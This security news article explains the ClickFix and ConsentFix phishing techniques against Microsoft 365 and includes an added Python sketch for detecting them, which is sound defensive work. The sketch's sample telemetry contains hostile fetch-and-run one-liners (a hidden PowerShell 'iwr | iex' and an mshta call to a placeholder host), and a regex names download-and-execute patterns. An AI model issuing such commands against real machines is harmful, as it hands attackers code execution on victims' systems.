The Mechanics of ClickFix and ConsentFix
A new wave of attacks targets Microsoft 365 accounts by exploiting user familiarity with routine web interactions. The ClickFix technique, which surged in 2025, displays a fake prompt (a broken page to "fix", a verification step) that instructs victims to press a short sequence of keyboard shortcuts, typically opening the Run dialog and pasting a command the page has already placed on the clipboard. The victim's own keystrokes then execute that attacker-supplied command on the victim's own machine, so the payload lands without exploiting any software vulnerability and without a downloaded file for traditional defenses to inspect.
Attackers have since evolved this approach into a more sophisticated variant called ConsentFix, which moves the attack surface to Microsoft 365's OAuth sign-in and consent flows. Victims receive a phishing lure through trusted file-sharing platforms such as Dropbox or DocSend, often behind a password so that URL scanners and sandboxes cannot reach the content. The user then lands on a genuine Microsoft authentication screen, completes the sign-in, and is sent to a localhost callback link of the kind native desktop clients use; the lure instructs the user to drag that link where the page indicates. The callback URL carries the OAuth authorization code, which the attacker redeems for access and refresh tokens, so the victim hands over the session without ever typing a credential anywhere that looks wrong.
Impact and Proliferation
ConsentFix gives attackers session access to email and other Microsoft 365 services without stealing a password or defeating multi-factor authentication: the victim completes the real sign-in, MFA included, and it is the resulting session that is stolen. By early March 2026, a detailed walkthrough of ConsentFix was posted to a public Russian cybercrime forum, including working code, infrastructure screenshots, and a video tutorial.
The attack infrastructure relies on free or widely available services, and the forum post also explained how to profile targets on LinkedIn and similar sites before sending phishing messages. Packaged with step-by-step guidance in this way, a technique that once required significant technical skill is now within reach of low-skill operators.
Defensive Strategies
Awareness remains a critical defense. These attacks depend on users moving through familiar workflows without pausing to question unusual requests such as pressing hotkeys or dragging a strange link. Defenders also need detection coverage for the traces the attacks leave behind: on the endpoint, a script host such as PowerShell or mshta spawned from explorer.exe (the Run dialog) with a pasted one-liner on its command line; in identity logs, a normal interactive sign-in from the user's own device followed shortly by token use or new sessions from an unexpected location or client.
Endpoint and identity monitoring can surface these signals before a brief user lapse leads to full account compromise. The core pattern is that attackers interrupt a normal workflow at the right moment and let the victim complete the attack. Understanding this pattern is the first step toward stopping it.
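As an added illustration of that detection coverage (example code written for this page, not code from the article or from BleepingComputer), the following Python sketch runs both checks over constructed telemetry: Sysmon-style process-creation events for the ClickFix process tree, and Entra-style sign-in records for a real interactive sign-in followed within a short window by token use from another country. The field names, the placeholder app name, and every account and IP address in the sample are assumptions made for the example.

```python
"""Detection sketch for the traces named above: the ClickFix process tree on the endpoint
and ConsentFix token use from an unexpected location in identity logs.
Added example; every log record below is constructed, not real telemetry."""
import re
from datetime import datetime, timedelta

# ---- ClickFix: script host launched from the shell with a pasted one-liner -------------
# The Run dialog (Win+R) is hosted by explorer.exe, so the pasted command appears as a
# script host whose parent is explorer.exe. A console the user opens from the Start menu
# has the same parent, so the command line must also look like a pasted payload.
SHELL_PARENT = "explorer.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
PASTED_PAYLOAD = re.compile(
    r"-w(indowstyle)?\s+hidden"                      # hidden window
    r"|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"  # base64-encoded script
    r"|\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex)\b"  # fetch and run
    r"|mshta\s+https?://"                            # remote HTA
    r"|curl\s.*\|\s*(sh|bash)\b",                    # macOS/Linux flavour of the lure
    re.IGNORECASE,
)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_hits(process_events):
    """Return process-creation events (Sysmon Event ID 1 style fields) matching the ClickFix tree."""
    return [
        ev for ev in process_events
        if basename(ev["parent_image"]) == SHELL_PARENT
        and basename(ev["image"]) in SCRIPT_HOSTS
        and PASTED_PAYLOAD.search(ev["command_line"])
    ]

# ---- ConsentFix: the victim's real sign-in, then the session used from somewhere else ----
def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def consentfix_hits(signins, window=timedelta(hours=2)):
    """Pair each interactive sign-in with later non-interactive sign-ins (token use) by the
    same user from a different IP and country within `window`. That is the footprint the
    attack leaves: no failed logins and no MFA prompt for the attacker, just a session that
    starts on the victim's machine and continues from elsewhere. A production rule should
    baseline each user's usual countries and ASNs and exclude VPN egress to cut noise."""
    by_user = {}
    for rec in sorted(signins, key=lambda r: _ts(r["createdDateTime"])):
        by_user.setdefault(rec["userPrincipalName"], []).append(rec)
    hits = []
    for recs in by_user.values():
        for i, first in enumerate(recs):
            if not first["isInteractive"]:
                continue
            t0 = _ts(first["createdDateTime"])
            for later in recs[i + 1:]:
                if _ts(later["createdDateTime"]) - t0 > window:
                    break
                if (not later["isInteractive"]
                        and later["ipAddress"] != first["ipAddress"]
                        and later["location"]["countryOrRegion"] != first["location"]["countryOrRegion"]):
                    hits.append((first, later))
    return hits

# ---- constructed sample telemetry (hypothetical accounts, hosts and addresses) -------------
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PROCESS_EVENTS = [
    {"user": r"CORP\jdoe", "parent_image": r"C:\Windows\explorer.exe", "image": PS,      # ClickFix
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/v -UseBasicParsing | iex"'},
    {"user": r"CORP\jdoe", "parent_image": r"C:\Windows\explorer.exe", "image": PS,      # console opened by hand
     "command_line": "powershell.exe"},
    {"user": r"CORP\asmith", "parent_image": r"C:\Program Files\Editor\editor.exe", "image": PS,  # IDE task
     "command_line": "powershell -NoLogo -File build.ps1"},
    {"user": r"CORP\asmith", "parent_image": r"C:\Windows\explorer.exe",                # ClickFix, HTA variant
     "image": r"C:\Windows\System32\mshta.exe", "command_line": "mshta https://example.invalid/verify.hta"},
]

def _signin(when, upn, interactive, ip, country, app="NativeClientApp (hypothetical)"):
    # Field names follow Entra sign-in logs; the app name is a placeholder, not a real client.
    return {"createdDateTime": when, "userPrincipalName": upn, "isInteractive": interactive,
            "ipAddress": ip, "location": {"countryOrRegion": country}, "appDisplayName": app}

SIGNIN_LOGS = [
    _signin("2026-03-09T14:03:20Z", "jdoe@corp.example", True,  "198.51.100.7",  "US"),   # victim signs in
    _signin("2026-03-09T14:09:05Z", "jdoe@corp.example", False, "203.0.113.50",  "NL"),   # attacker uses tokens
    _signin("2026-03-09T14:20:00Z", "jdoe@corp.example", False, "198.51.100.7",  "US"),   # victim's own refresh
    _signin("2026-03-09T13:50:00Z", "asmith@corp.example", True,  "198.51.100.22", "US"),
    _signin("2026-03-09T14:05:00Z", "asmith@corp.example", False, "198.51.100.22", "US"),
    _signin("2026-03-09T17:30:00Z", "asmith@corp.example", False, "203.0.113.9",  "DE"),  # outside the window
]

if __name__ == "__main__":
    for ev in clickfix_hits(PROCESS_EVENTS):
        print("ClickFix tree:", ev["user"], basename(ev["image"]), ev["command_line"])
    for first, later in consentfix_hits(SIGNIN_LOGS):
        print("ConsentFix pattern:", first["userPrincipalName"], first["ipAddress"], "->", later["ipAddress"])
```

Run as-is, the script reports the two pasted one-liners under explorer.exe and the one jdoe session that was signed in from a US address and then used from a Dutch one six minutes later; the hand-opened console, the IDE-driven script and the asmith sign-ins stay quiet. The two checks are deliberately independent so each can be dropped into endpoint or identity tooling on its own.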
Source: BleepingComputer
